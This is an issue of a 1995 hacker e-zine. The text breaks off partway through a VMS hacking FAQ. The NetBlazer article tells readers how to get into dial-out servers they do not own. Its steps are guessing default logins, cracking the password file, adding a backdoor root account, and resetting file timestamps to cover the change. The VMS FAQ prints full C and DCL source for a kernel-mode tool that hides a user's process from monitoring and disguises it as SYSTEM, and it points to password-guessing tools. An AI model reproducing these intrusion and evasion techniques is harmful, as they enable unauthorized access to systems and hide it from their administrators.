Copy Link
Add to Bookmark
Report

Hackers Issue 02

eZine's profile picture
Published in 
Hackers
 · 4 years ago


  
* * * * * * * * * * * * * * * * * * * *

-= H A C K E R S =-

Issue #2, September 1995

Edited by: Revolution

"Hacking is life. The rest is just details."


Table of Contents

From the Editor . . . . . . . . . . . . . . . . . . . . . . . . .Revolution

Hacking Net Blazer . . . . . . . . . . . . . . . . . . . . . . . . . . Jojo

VMS FAQ . . . . . . . . . . . . . . . . . . . . . . . . . . . . .The Beaver

BillWatch #15 . . . . . . . . . . . . . . . Voters Telecommunications Watch

Security Resources List . . . . . . . . . . . . . . . . . Christopher Klaus

Zoomin' . . . . . . . . . . . . . . . . . . . . . . . . . Black Magic Radio

Low Power Broadcasting FAQ . . . . . . . . . . . . . . . . . .Rick Harrison

The AOL Syndrome. . . . . . . . . . . . . . . . . . . . . . . . .Revolution

The End . . . . . . . . . . . . . . . . . . . . . . . . . . . . .Revolution

----------------------------------------------------------------------------
copyright 1995 by Mike Scanlon All articles remain the property of their
authors, and may be reprinted with their permission. This zine may be
reprinted freely as a whole electronically, for hard copy rights mail the
editor. HACKERS is published monthly by Mike Scanlon, to be added to the
subscription list or to submit articles mail scanlonr@delphi.com
----------------------------------------------------------------------------
* * * * * * * * * * * * * * * * * * * *

-= H A C K E R S =-

Issue #2, File #1 of 9

From the Editor

By: Revolution


Mondo 2000 might have all the cool cover art, but we've got
everything else this issue. News from a pirate radio station, a
little bit on how to start your own low power broadcasting unit,
hacking articles on two operating systems, some news on what's
going on in congress, and hell, even a little arm chair philosophy.

But what makes this issue so special isn't what's in it, but
what's not in it. I was planning on including an excellent article
on social engineering by Ira Winkler, but I wasn't allowed to
because her boss thought it would be in bad taste to run the
article in a zine which featured an article on Unix hacking (by the
Prophet, HACKERS #1). Apparently there was some fear that instead
of it being a lesson in security, or how to stop social
engineering, it would be used in the opposite sense, as a how to
for hackers to get informaion out of corporate employees. Of
course none of you would use the articles in this magazine to
undermine security, would you? No.....

But I hope this doesn't prove to be a turn off to all would be
authors who happen to be security professionals. Of course any
article that appears in this magazine is going to seen by those who
are more interested in undermining security than in maintaining it,
but so is any publication. That is the risk of publishing your
work. It is going to be seen by everyone; even those who would use
it for uses other than you would have them. With that in mind, Ira
Winkler's article "A Case Study: Social Engineers Wreak Havoc,"
which happens to be a very good article, is available on the world
wide web, along with a lot of other good security stuff, at
http://all.net.

This is a magazine by, for, and about hackers. Hackers are
those who follow the ethic, those who do interesting things with
computers. If you've hacked a good firewall set up, or something
else to do with security, don't be afraid to write an article and
send it here.

With that out of the way, let's get on with the good stuff.
Thanks to VTW for allowing me to reprint BillWatch, a mailing list
anybody who wishes to stay abreast with the goings on in congress
should subscribe to. Thanks to Jojo for writing the first hacking
article written specifically for publication in HACKERS, and thanks
to everyone else who let me reprint their stuff.

HACKERS has found a home on the world wide web thanks to Klon
at http://wildsau.idv.uni-linz.ac.at/~klon. I'm still looking for
an ftp support site. If you'd like to give me a directory to put
back issues in, get in touch with me. I didn't get enough mail to
justify a letters column, so write in what you think about this
issue, and hopefully next month we'll get something together. As
always, I'm looking for more articles. If you have anything in
mind you'd like to write about, or have written, mail me. My
address is still scanlonr@delphi.com.

Hope you have as much fun reading this issue as I did putting
it together.

- Revolution

* * * * * * * * * * * * * * * * * * * *
As always, the standard disclaimer applies. All of these articles are
provided for informational purposes only, Mike Scanlon and the respective
authors cannot be held accountable for any illegal acts they are used to
commit.
* * * * * * * * * * * * * * * * * * * *

-= H A C K E R S =-

Issue #2, File #2 of 9

IMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM;
: T H E N E T B L A Z E R O P E R A T I N G S Y S T E M :
HMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM<

By: Jojo


I know this os is used on some dialout servers than you could access by using
telnet or a phone number you found out. You'll know you're on such a server
when you get this login screen:

Company's_name NetBlazer Version 2.1
XXXX-login: telebit

Then you'll remember you got this article to help you :-))))



GETTING PASSED THE LOGIN:
-------------------------

Try logins like test, setup, remote, snmp, MAV, the company's name or any
other name you see on the login screen! Use passwords like remote, test, dial,
dialout, or no password at all ;-)

If you manage to get a login with good enough privileges (rights), you'll be
able to use most of the commands described in this article. If you find a
normal user login, then go straight to "DIALING OUT" to see if you have the
right to use the modem on the server.



CREATING YOUR OWN ACCOUNT:
--------------------------

You'll have to edit the passwd file to do that. It's a Unix-like passwd file
with passwords encrypted on it.

XXXX:Top> type passwd
snmp::0::,,,::configure; logout
root:2gi.xa2.DgUIo:0::,,,::
remote::2::,,,::
[....]

Here you see that the snmp login has no password! This is *very* usual on
new servers that haven't been configured yet. Anyway... Get this passwd file
and run a CRACKER PROGRAM on it: you can use Cracker Jack on your PC, works
fine. I cracked more than 50% of the passwords, some users really always use
the same easy_to_guess passwords everywhere :-))))

OK now you know the easy login you used will soon be changed. So you better
hurry up creating your own account by adding a line to the passwd file:

XXXX:Top> chmod -w passwd
XXXX:Top> edit passwd
*a
[ Now you enter your own line, something like: ]
[ my_root_access::0::,,,:: ]
*w
*q
XXXX:Top> chmod w passwd

The command "chmod" is like "attrib" on DOS.
If you want to be a good boy and leave the place tidy, you can change the
date & time of the passwd file to the one it had before you changed it.
Use the "settime" command, edit and save the file again, then use "settime"
once more to set back the real date and time.

Now you have a new account to login with if the easy_to_guess logins are
changed by the root.



GET MORE INFO ABOUT THE SERVER:
-------------------------------

When you hack on a server (internet or phone) always remember to get some
good information about it, things like where it actually is located, what
it is used for, names of users on it.... Why? Simply because if the access
numbers get changed, you'll use the information you got to try to find out
the *new* access numbers (internet address or phone number).

On NetBlazer you can do the following:

XXXX:Top> dir
SETONE INF 4501 01-10-95 02:52
UPDATE INF 626 02-13-95 02:53
REGISTER INF 320 02-04-95 14:23
[....]
92 File(s) (2500195 bytes) 150002 bytes free
XXXX:Top> type register.inf
set R(site) ---> the_company's_name
set R(contact) ---> this is the root's real name :-)))
set R(phone) ---> Yes give him a phone call!!!
[....]
XXXX:Top>



OTHER COMMANDS:
---------------

Type "?" to see what you can do:

XXXX:Top> ?
Available commands:
bin> configure> disk> help
history> list> logout reboot
sessions> shutdown top> ?
XXXX:Top> list
XXXX:Top>List> ?
Available commands:
alias arp asy destination
dialout domain dynamic ethernet
filter group history icmp
[....]
XXXX:Top>List>

"bin" and "configure" are directories, "logout" is a command.
You can easily learn how to use them if you are interested, just try them out
or use the "help" command.



DIALING OUT:
------------

Add a phone number to dial if you have the right to:

XXXX:Top> configure
XXXX:Top>Configure> dialout
XXXX:Top>Configure>Dialout> add
Name of dialout: elite_bbs
Phone number: 1-TRY-GET-ME!!
[....]
XXXX:Top>Configure>Dialout> dial elite_bbs
[....]

Else just use "list" to see what phone numbers have already been configured
and try them out for fun :-)))

XXXX:Top>Configure>Dialout> list
Name Phone Characteristics
Your_mother dialout
Your_grand_mother dialout
And_all_the_mafia_family dialout
[....]
XXX:Top>Configure>Dialout>



-----------------------------------------------------------------------------
----- H A V E F U N H A C K I N G A N D P H R E A K I N G -------
-----------------------------------------------------------------------------

[To get in touch with Jojo, mail him on brinta bbs, at 145.24.149.50.
- Revolution]

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

-= H A C K E R S =-

Issue #2, File #3 of 9

- VMS FAQ (Frequently Ask Questions) -

- Beta 0.01 Release -

By: The Beaver


Introduction:

This article contain the answers to some frequently asked question
(Hence, the name FAQ) about hacking the VMS operating system.

The article may be freely redistributed in its entirety provide
that credits are not altered or removed. It may not be
sold for profit or incorporated in commercial documents without
the written permission of the author(s).

This is the beta release of this article, which means,
the article is still in the working, and is not complete.

Submissions, corrections, comments, input, complaints,
bomb threats, cash, etc., should be directed toward
The Beaver (beaver@upperdck.blkbox.com).


Index ---:

More Common Newbie Questions:

1. VMS Basic information ("What does VMS run on?")
2. Password storage information (SYSUAF.DAT) ("Where the hell is the
/etc/passwd file??!?!?!"
)
3. Cracking the SYSUAF.DAT ("Is there a version of 'Crack' for VMS
machines?"
)
4. Becoming invisible in VMS ("Is there a 'Cloak' routine in VMS?")
5. SET DEFAULT command ("How the do I change damn directory's?")
6. The infamous "CD" .COM file ("I hate this SET DEFAULT crap")
7. LOGIN.COM ("Okay, where's my .profile???").
8. Captive Accounts ("I can't get to DCL").

VMS Mail Hack Routines:

1. Fake Mail ("How do I send fake mail to VMS machines?")
2. Unix/VMS Sendmail holes ("Will my sendmail holes work on VMS?")
3. Mail Bomb ("I need to mailbomb a user from my VMS account, how?)

User/Image Privilege Information:

1. Systems Privileges, Listing and explanation ("
How are Priv's setup?")
2. Creating privileged imagines ("
Can I create a SUID Shell on a VMS box?")

DECNetwork Information.

1. Brief Description of a DECNet ("
What's a DECNet?")
2. What it means to you ("
What can it do for me?")
3. Obtaining files/system info/etc ("
How do I get information for the remote?")
4. Using remote nodes ("
How do I connect interactively?")
5. Getting node lists ("
How do I find connectable nodes?")
6. Proxy Logins ("
Can't DECNet nodes be protected?")
7. Proxy Logs ("
Are Proxy logins logged? Can I use it to break into nodes?")

TCP/IP Connected VMS Machines.

1. Obtaining remote usernames without "
FINGER" ("How do I get usernames
if FINGER is disabled")
2. Changing the image running in FINGER ("
How do I link a command name to
another so it appears I am running a different image?")


- More Common Newbie Questions -


1. "
What does VMS run on?"

VMS (Virtual Memory System) runs on Digital Equipment Corp.
(DEC - pronounced, "
DECK") VAX (Virtual Address eXtension)
and the newer Alpha's. The user uses DCL (DEC Command
Language) to interact with the computer. These commands
and there syntax are completely different then those of
Unix and Unix-like operating systems, thus a completely
different mindset is often required (this is the authors
opinion).

2. "
Why A 'VMS-Hacking FAQ'?"

Several reasons. Once and a while, A escape from Unix is
very, very nice. Another reason is that is art of
VMS hacking has since vanished, and its replacement are
statements like, "
Hacking VMS is impossible", "VMS is
to cryptic to use", and as always, "Man, VMS sucks".

These are generally statements by people who know almost
zero about VMS. I don't want to go into a "
which OS is
better", because that would defeat the purpose of this
file"
, but in my personal opinion, both OS's have
there advantages/disadvantages.

I have, however, written this FAQ with a Unix overtone
to it, to help the reader understand what is trying to
be accomplished in some examples.

3. "Where in the hell is the passwd file???!?!?!"

There is no /etc/passwd file. All user information is kept in
a file called SYSUAF.DAT, which is stored in the directory
(or actual the logical) SYS$COMMON. This file is usually
not readable by "normal" users.

4. "Is there a version of "Crack" that I can run on a VMS machine?"

The unix program, "Crack" will not work, but there are password
guessing routines available.

The best on I have seen is "GUESS_PASSWORD.EXE", which can be
obtained from the following sites.

ftp.wku.edu:/vms/fileserv/uaf.zip
ftp.spc.edu:/macro32/savesets/uaf.zip

In order for the routine to work, you need access to the
SYSUAF.DAT. This version works on both OpenVMS VAX and
OpenVMS AXP

5. "Can I 'Cloak' in routine in VMS?"

Yes. Below is the code needed to make your process invisible
to "FINGER", "SHOW USERS", etc...

First, create the following file:

Name: BUILD_INVISIBLE.COM
---------------------------------[Cut Here]-----------------------------------
$ save_verify = 'f$verify(0)'
$ system = "vax" !Set to "alpha" for Alpha
$!
$! File to build Ehud Gavron's INVISIBLE
$!
$! Author: Hunter Goatley
$!
$ say := write sys$output
$ on error then goto common_exit
$ on contrl_y then goto common_exit
$ say "Extracting $JIBDEF and $PCBDEF from LIB.MLB...."
$ library/macro/extr=$JIBDEF/out=jibdef.mar sys$library:lib.mlb
$ library/macro/extr=$PCBDEF/out=pcbdef.mar sys$library:lib.mlb
$ say "Converting $*DEF macros to C .H files...."
$ call convert_to_h jibdef.mar
$ call convert_to_h pcbdef.mar
$ say "Compiling INVISIBLE...."
$ cc invisible
$ say "Linking INVISIBLE...."
$ link/notrace invisible,invisible.opt_'system'/opt
$ say "INVISIBLE build completed"
$ common_exit:
$ exit f$verify(save_verify).or.1
$ convert_to_h: subroutine
$ name = f$parse(p1,"","","NAME")
$ open/read tmp 'p1'
$ create 'name'.H
$ open/append tmph 'name'.H
$ cvt_loop:
$ read/error=cvt_fin tmp line
$ if f$extract(0,4,line).nes."$EQU" then goto cvt_loop
$ write tmph "#define ",f$extract(4,255,line)
$ goto cvt_loop
$ cvt_fin:
$ close tmp
$ close tmph
$ write sys$output "C header file ''name'.H created"
$ exit
$ endsubroutine
-------------------------------[End Of File]-----------------------------------

Next is the C Code for the "INVISIBLE" routine....


Name: INVISIBLE.C
---------------------------------[Cut Here]------------------------------------
/*
* Invisible - Make a process invisible and visible again. Originally
* written in MACRO32. Now in C so it runs on Alpha too.
*
*
* Option file invisible.opt:
* ALPHA: sys$loadable_images:sys$base_image.exe/share
*
* VAX: sys$system:sys.stb/selective_search
*
*
* Build:
* $ cc invisible
* $ link invisible,invisible/opt
*
* Usage:
* $ run invisible
*
*
* Ehud Gavron
* ACES Consulting Inc.
* Gavron@ACES.COM
*
* 14-Oct-1992 Ehud Gavron Ported to C, Alpha, ANSI, and
* everything else.
*
*/


#define module_name INVISIBLE
#define module_version "V1.0.0"

#ifdef __alpha
#pragma module module_name module_version
#else /* __vax */
#module module_name module_version
#endif /* __alpha */

#ifndef __alpha
#define sys$gl_ijobcnt sys$gw_ijobcnt
#endif

#include <descrip.h>
#include "jibdef.h" /* Extracted from LIB.MLB and massaged into C form */
#include "pcbdef.h" /* Extracted from LIB.MLB and massaged into C form */
#include <ssdef.h>
#include <jpidef.h>
#include <psldef.h>
#include <lnmdef.h>
typedef union {
struct {
short s_buflen;
short s_itemcode;
char *s_bufaddr;
int *s_retlen;
} s;
unsigned long end;
} ITEMLIST;

#define buflen s.s_buflen
#define itemcode s.s_itemcode
#define bufaddr s.s_bufaddr
#define retlen s.s_retlen

struct ISB {
int l_uic;
int l_namelen;
#ifdef __alpha
int l_jobtype;
#else
char b_jobtype;
#endif
char b_terminal;
char t_lname[PCB$S_LNAME + 1];
char t_username[JIB$S_USERNAME + 1];
};

struct ISB isb;
static int lnm_retlen;

ITEMLIST lnm_itmlst[2];
ITEMLIST jpi_itmlst[2];
struct dsc$descriptor_s prcnam_desc;
struct dsc$descriptor_s prcnam;
$DESCRIPTOR(lnm_tabnam,"LNM$PROCESS_TABLE");
$DESCRIPTOR(lnm_lognam,"ISB");
$DESCRIPTOR(fao_prcnam,"SYMBIONT_!UL");
int sysuic = 0x00010004;
char sysusername[] = "SYSTEM ";
char namebuf[PCB$S_LNAME];

#ifdef __alpha
main()
#else
cmain()
#endif
{
int sys$cmkrnl(),sys$exit(),invisible_k();
int ss_stat;

lnm_itmlst[0].buflen = sizeof(isb);
lnm_itmlst[0].itemcode = LNM$_STRING;
lnm_itmlst[0].bufaddr = (char *)&isb;
lnm_itmlst[0].retlen = &lnm_retlen;
lnm_itmlst[1].end = 0;

jpi_itmlst[0].buflen = PCB$S_LNAME;
jpi_itmlst[0].itemcode = JPI$_PRCNAM;
jpi_itmlst[0].bufaddr = (char *)&isb.t_lname;
jpi_itmlst[0].retlen = (int *)&isb.l_namelen;
jpi_itmlst[1].end = 0;

prcnam_desc.dsc$a_pointer = (char *)&isb.t_lname;
prcnam_desc.dsc$w_length = PCB$S_LNAME;
prcnam_desc.dsc$b_dtype = DSC$K_DTYPE_T;
prcnam_desc.dsc$b_class = DSC$K_CLASS_S;

prcnam.dsc$a_pointer = (char *)&namebuf;
prcnam.dsc$w_length = PCB$S_LNAME;
prcnam.dsc$b_dtype = DSC$K_DTYPE_T;
prcnam.dsc$b_class = DSC$K_CLASS_S;

ss_stat = sys$cmkrnl(invisible_k,0);
(void) sys$exit(ss_stat);
}

int invisible_k()
{
int sys$getjpiw(),sys$crelnm(),sys$fao(),sys$setprn();
int strncpy(),sys$exit(),sys$trnlnm(),sys$dellnm();
int *a_long;
int acmode = PSL$C_KERNEL;

#pragma nostandard /* Oh well */
globalref ctl$gl_pcb;
globalref sys$gl_ijobcnt;
#pragma standard

int ss_stat;
char *pcb;
char *jib;
long *sts;
long *own;
char *p;
long *q;
int loop = 0;

pcb = (char *)ctl$gl_pcb;

if (pcb == 0) {
return(0);
}
q = (long *)((char *)pcb + PCB$L_JIB);
jib =(char *) *q;

sts = (long *)((char *)pcb + PCB$L_STS);

if (*sts & PCB$M_INTER) { /* Do stealth mode */
*sts = *sts^PCB$M_INTER;
*sts = *sts|PCB$M_NOACNT;

own = (long *)((char *)pcb + PCB$L_OWNER);
if (*own == 0) { /* We are not a subprocess */
sys$gl_ijobcnt--;
}

p = (char *)pcb + PCB$T_TERMINAL;
isb.b_terminal = *p;
*p = '\0';


#ifdef __alpha
q = (long *)((char *)jib + JIB$L_JOBTYPE);
isb.l_jobtype = *q;
*q = 0;
#else
p = (char *)jib + JIB$B_JOBTYPE;
isb.b_jobtype = *p;
*p = '\0';
#endif
strncpy((char *)&isb.t_username,
(char *)(jib + JIB$T_USERNAME),
JIB$S_USERNAME);

strncpy((char *)(jib + JIB$T_USERNAME),
(char *)&sysusername,
JIB$S_USERNAME);

q = (long *)((char *)pcb + PCB$L_UIC);
isb.l_uic = *q;
*q = sysuic;

ss_stat = sys$getjpiw(0,0,0,&jpi_itmlst,0,0,0);
if (!(ss_stat & 1)) return(ss_stat);
ss_stat = sys$crelnm(0,
&lnm_tabnam,
&lnm_lognam,
&acmode,
&lnm_itmlst);
if (!(ss_stat & 1)) return(ss_stat);
do {
loop++;
prcnam.dsc$w_length = PCB$S_LNAME;
ss_stat = sys$fao((char *)&fao_prcnam,
(char *)&prcnam.dsc$w_length,
(char *)&prcnam,
loop);
if (!(ss_stat &1)) return(ss_stat);
ss_stat = sys$setprn((char*)&prcnam);
} while (ss_stat == SS$_DUPLNAM);
return(SS$_NORMAL);
}
else { /* unstealth */
ss_stat = sys$trnlnm(0,
&lnm_tabnam,
&lnm_lognam,
&acmode,
&lnm_itmlst);
if (!(ss_stat & 1)) return(ss_stat);

ss_stat = sys$dellnm(&lnm_tabnam,
&lnm_lognam,
&acmode);
if (!(ss_stat & 1)) return(ss_stat);

*sts = *sts|PCB$M_INTER;
*sts = *sts^PCB$M_NOACNT;

own = (long *)((char *)pcb + PCB$L_OWNER);
if (*own == 0) { /* We are not a subprocess */
sys$gl_ijobcnt++;
}

q = (long *)((char *)pcb + PCB$L_UIC);
*q = isb.l_uic;

p = (char *)pcb + PCB$T_TERMINAL;
*p = isb.b_terminal;

#ifdef __alpha
q = (long *)((char *)jib + JIB$L_JOBTYPE);
*q = isb.l_jobtype;
#else
p = (char *)jib + JIB$B_JOBTYPE;
*p = isb.b_jobtype;
#endif
strncpy((char *)(jib + JIB$T_USERNAME),
(char *)&isb.t_username,
JIB$S_USERNAME);

prcnam_desc.dsc$w_length = (short)isb.l_namelen;
ss_stat = sys$setprn(&prcnam_desc);
return;
}
}

#ifndef __alpha
int strncpy(a,b,c)
char *a,*b;
int c;
{
for (; c > 0; c--) {
*a++ = *b++;
}
}
#endif
--------------------------------[End Of File]----------------------------------

After these files are created, type in the following at your
DCL prompt:

$ @build_invisible ! This will build our INVISIBLE.EXE routine.
$ run invisible ! One the build is complete.

You should be completely "cloaked".

To obtain full source, readme files, etc, you can obtain this
program from:

ftp.wku.edu:/vms/fileserv/invisible.zip
ftp.spc.edu:/macro32/savesets/invisible.zip

4. "How do I change damn directory's?".

This is done via the "SET DEFAULT" command. In the following
format:

$ SET DEFAULT device:[directory]


VMS uses a standard hierarchy system, in which devices and
directory's are separated. For example, our home device/directory
might be:

DISK3:[USR.JOEHACKER]

DISK3: would represent the device that we are on/using
while, [USR.JOEHACKER] would signify the actual directory
on that device that we are using. So, to change directory's,
we could type:

$ SET DEFAULT [USR.BOB]

If [USR.BOB] is a existing directory, this would now be our
current path (and we would still be located on the DISK3:
device. If we wanted to simply back out one level (to the
[USR]) on that device, we would issue the following command:

$ SET DEFAULT [-]

The "[-]" signifies one directory back. So if our path is,
[USR.BOB.HACKING.VMS.PROGRAMS], and we want to get to the
[USR.BOB] directory, instead of typing the entire path
again, we could simply type:

$ SET DEFAULT [---]

"[---]" means, back out three levels of the hierarchy.

There can be several devices on one VMS system (Device names
can be obtained via a "SHOW DEVICES"). While your
home directory might be on DISK3, another users could
be on device DISK2. To switch devices, we can add in
the device name, followed by the directory (if needed).
So, if you need to get to a users who stores information
in the DISK2:[REALLY.SECRET.STUFF] directory, you could
type the following DCL command:

$ SET DEFAULT DISK2:[REALLY.SECRET.STUFF]

Or if we are currently in the "DISK3:[REALLY]" and we want
to get to the information in the "DISK2:[REALLY]" directory,
we could simply type

$ SET DEFAULT DISK2:

And the rest would be carried over.

In the event that you need to get to the top of the hierarchy
(Unix equivelant: "cd /"), SET DEFAULT (to any disk structured
device) to "[000000]". For example, to get to the very
top of the hierarchy on device DISK2, you would type.

$ SET DEFAULT DISK2:[000000]

VMS will also allow you to SET DEFAULT to a directory that does
not exist. When this happens, the operating system will
inform you of this when you try to issue a command that requires
some sort of file I/O. If at any point you get completely
lost, you can return to your "home" directory by typing

$ SET DEFAULT SYS$LOGIN:


6. "I hate this SET DEFAULT crap. Can I just use 'cd' command like
I do in Unix?"
.

By default, no. There are two things that you can do.
One, add the following line to your "LOGIN.COM" (see
where my .profile in VMS' for more information)


$ CD :== SET DEFAULT ! I am hate typing that long "SET DEF" command

Or you can us the following .COM file, which will guarrent
that you eat as many resources as you can......

[Taken from Phrack, Vol. 2. Issue 19., File 2]
[ Coded By The Mentor ]

Code for CD.COM
>>>>>>>>>>>>>>>

$! CD.COM v6.09
$! The Ultimate Change Directory Command.
$!
$ hdir = f$trnlnm("SYS$LOGIN") ! Home Directory
$ ndir = f$edit(p1,"UPCASE") ! New Directory
$ odir = f$environment("DEFAULT") ! Old Directory
$ prompton = (f$edit(f$trnlnm("SYS$PROMPT"),"UPCASE") .eqs. "ON")
$!
$ if (ndir .eqs. "") then goto DISPLAY ! No Dir
$ if (ndir .eqs. "*") then goto DIRSEARCH ! Search for Dirs
$ if (ndir .eqs. "?") then goto HELP ! Instructions
$!
$ PARSE:
$ length = f$length(ndir) ! Fix up ndir
$ if (f$location("@",ndir) .eq. 0) .or. -
(f$location("$",ndir) .eq. 0) then ndir = f$extract(1, length - 1, ndir)
$ right = f$location("]",ndir) + 1
$ if (right .gt. length) then right = f$location(">", ndir)
$ if (right .le. length) then ndir = f$extract(0, right, ndir)
$!
$ if (f$trnlnm(ndir) .eqs. "") then goto CASESYM ! Not Logical Name
$ ndir = f$trnlnm(ndir) ! Logical Name
$ goto PARSE
$!
$ CASESYM:
$ if ("''&ndir'" .eqs. "") then goto CASE0 ! Not Symbol
$ ndir = 'ndir' ! Symbol
$ goto PARSE
$!
$ CASE0:
$ len_ndir = f$length(ndir) ! Regular Dir
$ if (f$location("[", ndir) .lt. len_ndir) .or. -
(f$location("<", ndir) .lt. len_ndir) then goto SETDIR
$!
$ CASE1: ! Home Dir
$ if ((ndir .nes. "HOME") .and. (ndir .nes. "\")) then goto CASE2
$ ndir = hdir
$ goto SETDIR
$!
$ CASE2: ! . .. .dir
$ if (f$location(".", ndir) .nes. 0) then goto CASE3
$ if (ndir .eqs. "..") then ndir = "-"
$ if (f$extract(0, 2, ndir) .eqs. "..") -
then ndir = "-" + f$extract(1, len_ndir - 1, ndir)
$ ndir = "[" + ndir + "]"
$ if (ndir .eqs. "[.]") then ndir = odir
$ goto SETDIR
$!
$ CASE3: ! :
$ if (f$location(":", ndir) .ge. len_ndir) then goto CASE4
$ left = f$location(":", ndir) + 1
$ symbol = f$extract(left, 1, ndir)
$ if (symbol .eqs. ":") then goto CASE3B ! :: Node
$ if ((symbol .eqs. "[") .or. (symbol .eqs. "<")) then goto SETDIR
$ ndir = f$extract(0, left, ndir) + "[" -
+ f$extract(left, len_ndir - left+1, ndir) + "]"
$ goto SETDIR
$!
$ CASE3B: ! NODE::nothing
$ if (f$length(ndir)-1 .gt. left) then goto CASE3C
$ ndir = ndir + "[000000]"
$ goto SETDIR
$!
$ CASE3C: ! NODE::directory
$ if ((f$location("[", ndir) - f$location("<", ndir)) .ne. 0) -
then goto SETDIR
$
$ ndir = f$parse(ndir,,,"NODE") + "[" + f$parse(ndir,,,"NAME") + "]"
$ goto SETDIR
$!
$ CASE4: ! dir
$ ndir = "[" + ndir + "]"
$!
$ SETDIR:
$ set default 'ndir'
$ if (f$parse("") .eqs. "") then goto DIRERROR
$!
$ DISPLAY:
$ if ((ndir .nes. "") .and. prompton) then goto NODISPLAY
$ hnode = f$getsyi("NODENAME")
$ cnode = f$parse(f$trnlnm("SYS$DISK"),,,"NODE") - "::"
$ if (cnode .eqs. "") then cnode = hnode
$ cdir = f$environment("DEFAULT")
$ write sys$output " "
$ write sys$output " Home Node: ", hnode
$ write sys$output " Home Directory: ", hdir
$ if (cdir .eqs. hdir) .and. (cnode .eqs. hnode) then goto DISPSKIP
$ write sys$output " Current Node: ", cnode
$ write sys$output " Current Directory: ", cdir
$ DISPSKIP:
$ write sys$output " "
$!
$ NODISPLAY:
$ ndir = f$environment("DEFAULT")
$ if .not. prompton then goto END
$!
$ if (f$length(ndir) .ge. 32) then goto TOOLONG
$!
$ SETPROMPT:
$ set prompt = 'ndir'" "
$!
$ END:
$ exit
$!
$ DIRERROR:
$ write sys$output " "
$ write sys$output " ", ndir, " Directory does not exist!"
$ write sys$output " "
$ set default 'odir'
$ ndir = odir
$ goto NODISPLAY
$!
$! Prompt Problems------------------------------------------------------------
$!
$ TOOLONG:
$! Prompt is too long. Get rid of everything to the left of [ or <. If that
$! doesn't work, get rid of a subdirectory at a time. As a last resort,
$! set the prompt back to $.
$!
$ left = f$location("[", ndir)
$ len_ndir = f$length(ndir)
$ if (left .ge. len_ndir) then left = f$location("<",ndir)
$ if (left .gt. 0) .and. (left .lt. len_ndir) -
then ndir = f$extract(left, len_ndir - left, ndir)
$!
$ STILLTOOLONG:
$ if (f$length(ndir) .lt. 32) then goto SETPROMPT
$ left = f$location(".", ndir) + 1
$ len_ndir = f$length(ndir)
$ if left .ge. len_ndir then ndir = "$ "
$ if left .ne. len_ndir -
then ndir = "[*" + f$extract(left, len_ndir - left, ndir)
$ goto STILLTOOLONG
$!
$! Wildcard Directory---------------------------------------------------------
$!
$ DIRSEARCH:
$ error_message = f$environment("MESSAGE")
$ on control_y then goto DIREND
$ on control_c then goto DIREND
$ set message/nosev/nofac/noid/notext
$ write sys$output " "
$ dispct = 1
$ dirct = 0
$ pauseflag = 1
$!
$ DIRLOOP:
$ userfile = f$search("*.dir")
$ if (userfile .eqs. "") .and. (dirct .ne. 0) then goto DIRMENU
$ if (userfile .eqs. "") then goto DIRNONE
$ dispct = dispct + 1
$ dirct = dirct + 1
$ on severe then $ userprot = "No Priv"
$ userprot = f$file_attributes(userfile,"PRO")
$ if userprot .nes. "No Priv" then userprot = " "
$ userfile'dirct' = "[." + f$parse(userfile,,,"NAME") + "]"
$ userprot'dirct' = userprot
$ lengthflag = (f$length(userfile'dirct') .gt. 18)
$ if lengthflag then write sys$output -
f$fao(" !3SL !34AS ", dirct, userfile'dirct'), userprot'dirct'
$ if (.not. lengthflag) then write sys$output -
f$fao(" !3SL !20AS ", dirct, userfile'dirct'), userprot'dirct'
$ if (dispct .lt. 8) then goto DIRLOOP
$ dirct = dirct + 1
$ userfile'dirct' = ""
$ dirct = dirct + 1
$ userfile'dirct' = ""
$ if pauseflag then goto DIRMENU
$ dispct = 0
$ goto DIRLOOP
$!
$ DIRMENU:
$ write sys$output " "
$ if (userfile .eqs. "") then goto DIRMENU2
$ write sys$output " M More subdirectories"
$ if pauseflag then -
$ write sys$output " N More subdirectories/No pause"
$!
$ DIRMENU2:
$ write sys$output " R Re-Display subdirectories"
$ write sys$output " Q Quit (default)"
$
$ DIRINQUIRE:
$ write sys$output " "
$ inquire dirchoice " Select One"
$ write sys$output " "
$!
$ if (dirchoice .gt. 0) .and. -
(dirchoice .le. dirct) then goto DIRCASEDIGIT
$ dirchoice = f$edit(dirchoice,"UPCASE")
$ if (dirchoice .eqs. "") .or. -
(dirchoice .eqs. "Q") then goto DIRCASEBLANK
$ if (dirchoice .eqs. "M") .or. -
(dirchoice .eqs. "N") then goto DIRCASEMORE
$ if (dirchoice .eqs. "R") then goto DIRCASERED
$!
$ DIRCASERROR:
$ if (dirct .eq. 1) then write sys$output -
" Select 1 to change to the ", userfile1, " subdirectory. "
$ revdirct = dirct
$ if (dispct .eq. 8) then revdirct = revdirct - 2
$ if (dirct .gt. 1) then write sys$output -
" Valid subdirectory selections are 1 through ", revdirct, " (Octal)."
$ goto DIRINQUIRE
$!
$ DIRCASEDIGIT:
$ if (userfile'dirchoice' .eqs. "") then goto DIRCASERROR
$ ndir = userfile'dirchoice'
$ goto DIREND
$!
$ DIRCASEBLANK:
$ write sys$output " Subdirectory not changed."
$ write sys$output " "
$ goto DIREND
$!
$ DIRCASEMORE:
$ dispct = 0
$ if (dirchoice .eqs. "N") then pauseflag = 0
$ if (userfile .nes. "") then goto DIRLOOP
$ write sys$output " No more subdirectories to display."
$ goto DIRINQUIRE
$!
$ DIRCASERED:
$ dispct = 1
$ DISPLOOP:
$ if (userfile'dispct' .eqs "") then goto DISPDONT
$ lengthflag = (f$length(userfile'dispct') .gt. 18)
$ if lengthflag then write sys$output -
f$fao(" !3SL !34AS ", dispct, userfile'dispct'), userprot'dispct'
$ if (.not. lengthflag) then write sys$output -
f$fao(" !3SL !20AS ", dispct, userfile'dispct'), userprot'dispct'
$ DISPDONT:
$ dispct = dispct + 1
$ if (dispct .le. dirct) then goto DISPLOOP
$ goto DIRMENU
$!
$ DIRNONE:
$ write sys$output "No subdirectories to choose, or no directory privileges."
$ write sys$output " "
$ goto DIREND
$!
$ DIREND:
$ set message 'error_message'
$ on control_y then exit
$ on control_c then exit
$ if (ndir .eqs. "*") then goto DISPLAY
$ goto PARSE
$!
$!-Help-----------------------------------------------------------------------
$!
$ HELP:
$ type sys$input

